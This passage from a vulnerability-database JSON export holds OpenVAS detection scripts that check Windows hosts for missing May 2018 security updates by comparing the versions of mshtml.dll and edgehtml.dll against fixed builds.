value:\"Multiple flaw exists due to,\n\n - Microsoft browsers improperly access objects in memory.\n\n - The Win32k component fails to properly handle objects in memory.\n\n - Windows kernel fails to properly handle objects in memory.\n\n - The VBScript engine improperly handles objects in memory.\n\n - The scripting engine improperly handles objects in memory in Microsoft browsers.\n\n - Windows Common Log File System (CLFS) driver 
improperly handles objects in memory.\n\n - Chakra improperly discloses the contents of its memory.\n\n - Windows Hyper-V on a host server fails to properly validate input from an\n authenticated user on a guest operating system.\n\n - Windows 'its://' protocol handler unnecessarily sends traffic to a remote site\n in order to determine the zone of a provided URL.\n\n - An error in Credential Security Support Provider protocol (CredSSP).\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to gain the same user rights as the current user, run arbitrary\n code, disclose sensitive information and run processes in an elevated context\n and it may lead to further compromise of the system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8.1 for 32-bit/x64\n\n - Microsoft Windows Server 2012 R2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4103725\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"mshtml.dll\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"11.0.9600.19003\"))\n{\n report = 
report_fixed_ver(file_checked:sysPath + \"\\mshtml.dll\",\n file_version:fileVer, vulnerable_range:\"Less than 11.0.9600.19003\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:06:19", "description": "This host is missing a critical security\n update according to Microsoft KB4103716", "cvss3": {}, "published": "2018-05-09T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4103716)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-0959", "CVE-2018-0765", "CVE-2018-8174", "CVE-2018-8134", "CVE-2018-0854", "CVE-2018-8136", "CVE-2018-8126", "CVE-2018-0824", "CVE-2018-8164", "CVE-2018-8178", "CVE-2018-8132", "CVE-2018-0955", "CVE-2018-8179", "CVE-2018-0954", "CVE-2018-8127", "CVE-2018-8165", "CVE-2018-0953", "CVE-2018-8124", "CVE-2018-8112", "CVE-2018-8133", "CVE-2018-0958", "CVE-2018-8145", "CVE-2018-1039", "CVE-2018-8897", "CVE-2018-8122", "CVE-2018-8167", "CVE-2018-8166", "CVE-2017-11927", "CVE-2018-8129", "CVE-2018-0886", "CVE-2018-8137", "CVE-2018-1022", "CVE-2018-8114", "CVE-2018-0943", "CVE-2018-1025"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310813342", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813342", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4103716)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty 
of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813342\");\n script_version(\"2020-06-04T11:13:22+0000\");\n script_cve_id(\"CVE-2018-0765\", \"CVE-2018-0954\", \"CVE-2018-0955\", \"CVE-2018-0958\",\n \"CVE-2018-0959\", \"CVE-2018-1022\", \"CVE-2018-1025\", \"CVE-2018-1039\",\n \"CVE-2018-8112\", \"CVE-2018-8114\", \"CVE-2018-8122\", \"CVE-2018-8124\",\n \"CVE-2018-8126\", \"CVE-2018-8127\", \"CVE-2018-8129\", \"CVE-2018-8132\",\n \"CVE-2018-8133\", \"CVE-2018-8134\", \"CVE-2018-8136\", \"CVE-2018-8137\",\n \"CVE-2018-8145\", \"CVE-2018-8164\", \"CVE-2018-8165\", \"CVE-2018-8166\",\n \"CVE-2018-8167\", \"CVE-2018-8174\", \"CVE-2018-8178\", \"CVE-2018-8179\",\n \"CVE-2018-8897\", \"CVE-2018-0824\", \"CVE-2018-0854\", \"CVE-2018-0943\",\n \"CVE-2018-0953\", \"CVE-2018-0886\", \"CVE-2017-11927\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 11:13:22 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-05-09 10:30:13 +0530 (Wed, 09 May 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4103716)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4103716\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Windows Common Log File System (CLFS) driver improperly handles 
objects in\n memory.\n\n - The Win32k component fails to properly handle objects in memory.\n\n - The DirectX Graphics Kernel (DXGKRNL) driver improperly handles objects\n in memory.\n\n - Windows kernel fails to properly handle objects in memory.\n\n - Chakra improperly discloses the contents of its memory.\n\n - Scripting engine improperly handles objects in memory in microsoft browsers.\n\n - Internet Explorer fails to validate User Mode Code Integrity (UMCI) policies.\n\n - Chakra scripting engine improperly handles objects in memory in\n Microsoft Edge.\n\n - Windows Kernel API improperly enforces permissions.\n\n - Microsoft Edge improperly handles requests of different origins.\n\n - Windows Hyper-V on a host server fails to properly validate input from an\n authenticated user on a guest operating system.\n\n - Windows 'its://' protocol handler unnecessarily sends traffic to a remote site in\n order to determine the zone of a provided URL.\n\n - An error in Credential Security Support Provider protocol (CredSSP).\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run processes in an elevated context, run arbitrary code in kernel mode,\n circumvent a User Mode Code Integrity (UMCI) policy on the machine, gain the\n same user rights as the current user, discloses information to further\n compromise the user's computer or data, interrupt system functionality and\n cause denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 for 32-bit Systems\n\n - Microsoft Windows 10 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4103716\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.10240.0\", test_version2:\"11.0.10240.17860\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.10240.0 - 11.0.10240.17860\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:28:52", "description": "This host is missing a critical security\n update according to Microsoft KB4103723", "cvss3": {}, "published": "2018-05-09T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4103723)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-0959", "CVE-2018-0765", "CVE-2018-8174", "CVE-2018-8134", "CVE-2018-0961", "CVE-2018-0854", "CVE-2018-8136", "CVE-2018-8126", "CVE-2018-0824", "CVE-2018-8164", "CVE-2018-8178", "CVE-2018-8132", "CVE-2018-0955", "CVE-2018-8179", "CVE-2018-0951", "CVE-2018-0954", "CVE-2018-8127", "CVE-2018-8165", "CVE-2018-0953", "CVE-2018-8124", 
"CVE-2018-8112", "CVE-2018-8133", "CVE-2018-0958", "CVE-2018-8145", "CVE-2018-1039", "CVE-2018-8897", "CVE-2018-8122", "CVE-2018-8167", "CVE-2018-8166", "CVE-2017-11927", "CVE-2018-8129", "CVE-2018-0886", "CVE-2018-8137", "CVE-2018-1022", "CVE-2018-8114", "CVE-2018-0943", "CVE-2018-1025"], "modified": "2019-12-20T00:00:00", "id": "OPENVAS:1361412562310813340", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813340", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4103723)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813340\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2018-0765\", \"CVE-2018-0954\", \"CVE-2018-0955\", \"CVE-2018-0958\",\n \"CVE-2018-0959\", \"CVE-2018-0961\", \"CVE-2018-1022\", \"CVE-2018-1025\",\n \"CVE-2018-1039\", \"CVE-2018-8112\", \"CVE-2018-8114\", \"CVE-2018-8122\",\n \"CVE-2018-8124\", \"CVE-2018-8126\", \"CVE-2018-8127\", \"CVE-2018-8129\",\n \"CVE-2018-8132\", \"CVE-2018-8133\", \"CVE-2018-8134\", \"CVE-2018-8136\",\n \"CVE-2018-8137\", \"CVE-2018-8145\", \"CVE-2018-8164\", \"CVE-2018-8165\",\n \"CVE-2018-8166\", \"CVE-2018-8167\", \"CVE-2018-8174\", \"CVE-2018-8178\",\n \"CVE-2018-8179\", \"CVE-2018-8897\", \"CVE-2018-0824\", \"CVE-2018-0854\",\n \"CVE-2018-0943\", \"CVE-2018-0951\", \"CVE-2018-0953\", \"CVE-2017-11927\",\n \"CVE-2018-0886\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-09 10:00:32 +0530 (Wed, 09 May 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4103723)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4103723\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Windows Common Log File System (CLFS) driver improperly handles objects in\n 
memory.\n\n - The Win32k component fails to properly handle objects in memory.\n\n - The DirectX Graphics Kernel (DXGKRNL) driver improperly handles objects\n in memory.\n\n - Windows kernel fails to properly handle objects in memory.\n\n - Chakra improperly discloses the contents of its memory.\n\n - Scripting engine improperly handles objects in memory in microsoft browsers.\n\n - Internet Explorer fails to validate User Mode Code Integrity (UMCI) policies.\n\n - Microsoft browsers improperly handle objects in memory.\n\n - Windows Hyper-V on a host server fails to properly validate vSMB packet data.\n\n - Chakra scripting engine improperly handles objects in memory.\n\n - Windows Kernel API improperly enforces permissions.\n\n - Windows Hyper-V on a host server fails to properly validate input from an\n authenticated user on a guest operating system.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run processes in an elevated context, run arbitrary code in kernel mode,\n bypass security restrictions, obtain information to further compromise the\n user's system, interrupt system functionality and cause denial of service\n condition.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1607 x32/x64\n\n - Microsoft Windows Server 2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4103723\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.2247\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.14393.0 - 11.0.14393.2247\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:06:12", "description": "This host is missing a critical security\n update according to Microsoft KB4103731", "cvss3": {}, "published": "2018-05-09T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4103731)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-0959", "CVE-2018-0765", "CVE-2018-8174", "CVE-2018-0946", "CVE-2018-8134", "CVE-2018-0961", "CVE-2018-0854", "CVE-2018-8136", "CVE-2018-8126", "CVE-2018-0824", "CVE-2018-8164", "CVE-2018-8178", "CVE-2018-8170", "CVE-2018-8132", "CVE-2018-0955", "CVE-2018-8179", "CVE-2018-0951", "CVE-2018-0954", "CVE-2018-8127", "CVE-2018-8165", 
"CVE-2018-0953", "CVE-2018-8124", "CVE-2018-8112", "CVE-2018-8128", "CVE-2018-8133", "CVE-2018-0958", "CVE-2018-8145", "CVE-2018-1039", "CVE-2018-8897", "CVE-2018-8122", "CVE-2018-8167", "CVE-2018-8166", "CVE-2017-11927", "CVE-2018-8129", "CVE-2018-0886", "CVE-2018-8137", "CVE-2018-1022", "CVE-2018-8114", "CVE-2018-0943", "CVE-2018-1025"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310813341", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813341", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4103731)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813341\");\n script_version(\"2020-06-04T11:13:22+0000\");\n script_cve_id(\"CVE-2018-0765\", \"CVE-2018-8114\", \"CVE-2018-8122\", \"CVE-2018-8126\",\n \"CVE-2018-8127\", \"CVE-2018-8128\", \"CVE-2018-8129\", \"CVE-2018-8132\",\n \"CVE-2018-8133\", \"CVE-2018-8134\", \"CVE-2018-8136\", \"CVE-2018-8137\",\n \"CVE-2018-8145\", \"CVE-2018-8164\", \"CVE-2018-8165\", \"CVE-2018-8166\",\n \"CVE-2018-8167\", \"CVE-2018-8170\", \"CVE-2018-8174\", \"CVE-2018-8178\",\n \"CVE-2018-8179\", \"CVE-2018-8897\", \"CVE-2018-0886\", \"CVE-2018-0824\",\n \"CVE-2018-0854\", \"CVE-2018-0943\", \"CVE-2018-0946\", \"CVE-2018-0951\",\n \"CVE-2018-0953\", \"CVE-2018-0954\", \"CVE-2018-0955\", \"CVE-2018-0958\",\n \"CVE-2018-0959\", \"CVE-2018-0961\", \"CVE-2018-1022\", \"CVE-2018-1025\",\n \"CVE-2018-1039\", \"CVE-2018-8112\", \"CVE-2018-8124\", \"CVE-2017-11927\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 11:13:22 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-05-09 09:17:05 +0530 (Wed, 09 May 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4103731)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4103731\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Windows Common Log File 
System (CLFS) driver improperly handles objects\n in memory.\n\n - The Win32k component fails to properly handle objects in memory.\n\n - The DirectX Graphics Kernel (DXGKRNL) driver improperly handles objects\n in memory.\n\n - Windows kernel fails to properly handle objects in memory.\n\n - Scripting engine improperly handles objects in memory in microsoft browsers.\n\n - Chakra improperly discloses the contents of its memory.\n\n - Windows kernel improperly handles objects in memory.\n\n - Internet Explorer fails to validate User Mode Code Integrity (UMCI)\n policies.\n\n - Windows Hyper-V on a host server fails to properly validate vSMB packet\n data.\n\n - Chakra scripting engine handles objects in memory in Microsoft Edge.\n\n - Microsoft browsers improperly access objects in memory.\n\n - Windows Kernel API improperly enforces permissions.\n\n - Microsoft Edge improperly handles requests of different origins.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run processes in an elevated context, run arbitrary code in kernel mode,\n bypass security restrictions, gain the same user rights as the current user,\n disclose information to further compromise the user's computer or data,\n interrupt system functionality and also cause denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1703 x32/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4103731\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.15063.0\", test_version2:\"11.0.15063.1087\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.15063.0 - 11.0.15063.1087\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:06:01", "description": "This host is missing a critical security\n update according to Microsoft KB4103727", "cvss3": {}, "published": "2018-05-09T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4103727)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-0959", "CVE-2018-0765", "CVE-2018-8174", "CVE-2018-0946", "CVE-2018-8134", "CVE-2018-0961", "CVE-2018-0854", "CVE-2018-8136", "CVE-2018-8126", "CVE-2018-0963", "CVE-2018-0824", "CVE-2018-8164", "CVE-2018-8178", "CVE-2018-8170", "CVE-2018-8132", "CVE-2018-1021", "CVE-2018-0955", "CVE-2018-8179", "CVE-2018-0951", "CVE-2018-0954", 
"CVE-2018-8127", "CVE-2018-8165", "CVE-2018-0953", "CVE-2018-8124", "CVE-2018-8112", "CVE-2018-8128", "CVE-2018-8123", "CVE-2018-8133", "CVE-2018-0958", "CVE-2018-8145", "CVE-2018-1039", "CVE-2018-8141", "CVE-2018-8897", "CVE-2018-8130", "CVE-2018-8122", "CVE-2018-8167", "CVE-2018-8166", "CVE-2017-11927", "CVE-2018-8129", "CVE-2018-0886", "CVE-2018-8137", "CVE-2018-1022", "CVE-2018-8114", "CVE-2018-0943", "CVE-2018-1025"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310813346", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813346", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4103727)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813346\");\n script_version(\"2020-06-04T11:13:22+0000\");\n script_cve_id(\"CVE-2018-0765\", \"CVE-2018-0954\", \"CVE-2018-0955\", \"CVE-2018-0958\",\n \"CVE-2018-0959\", \"CVE-2018-0961\", \"CVE-2018-1021\", \"CVE-2018-1022\",\n \"CVE-2018-1025\", \"CVE-2018-1039\", \"CVE-2018-8112\", \"CVE-2018-8114\",\n \"CVE-2018-8122\", \"CVE-2018-8123\", \"CVE-2018-8124\", \"CVE-2018-8126\",\n \"CVE-2018-8127\", \"CVE-2018-8128\", \"CVE-2018-8129\", \"CVE-2018-8130\",\n \"CVE-2018-8132\", \"CVE-2018-8133\", \"CVE-2018-8134\", \"CVE-2018-8136\",\n \"CVE-2018-8137\", \"CVE-2018-8141\", \"CVE-2018-8145\", \"CVE-2018-8164\",\n \"CVE-2018-8165\", \"CVE-2018-8166\", \"CVE-2018-8167\", \"CVE-2018-8170\",\n \"CVE-2018-8174\", \"CVE-2018-8178\", \"CVE-2018-8179\", \"CVE-2018-8897\",\n \"CVE-2018-0824\", \"CVE-2018-0854\", \"CVE-2018-0943\", \"CVE-2018-0946\",\n \"CVE-2018-0951\", \"CVE-2018-0953\", \"CVE-2017-11927\", \"CVE-2018-0886\",\n \"CVE-2018-0963\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 11:13:22 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-05-09 11:45:30 +0530 (Wed, 09 May 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4103727)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4103727\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n 
script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Windows Common Log File System (CLFS) driver improperly handles objects\n in memory.\n\n - The Win32k component fails to properly handle objects in memory.\n\n - The DirectX Graphics Kernel (DXGKRNL) driver improperly handles objects\n in memory.\n\n - Windows kernel fails to properly handle objects in memory.\n\n - Scripting engine improperly handles objects in memory in microsoft browsers.\n\n - Chakra improperly discloses the contents of its memory.\n\n - Internet Explorer fails to validate User Mode Code Integrity (UMCI) policies.\n\n - Windows Hyper-V on a host server fails to properly validate vSMB packet data.\n\n - Windows Kernel API improperly enforces permissions.\n\n - Microsoft Edge improperly handles requests of different origins.\n\n - Windows Hyper-V on a host server fails to properly validate input from an\n authenticated user on a guest operating system.\n\n - An error in Credential Security Support Provider protocol (CredSSP).\n\n - Windows its:// protocol handler unnecessarily sends traffic to a remote\n site in order to determine the zone of a provided URL.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run processes in an elevated context, run arbitrary code in kernel mode,\n obtain information to further compromise the users system, bypass security\n restrictions, interrupt system and cause denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1709 for 32-bit Systems\n\n - Microsoft Windows 10 Version 1709 for 64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4103727\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.16299.0\", test_version2:\"11.0.16299.430\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.16299.0 - 11.0.16299.430\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2021-08-18T11:15:34", "description": "### *Detect date*:\n12/12/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Browsers. 
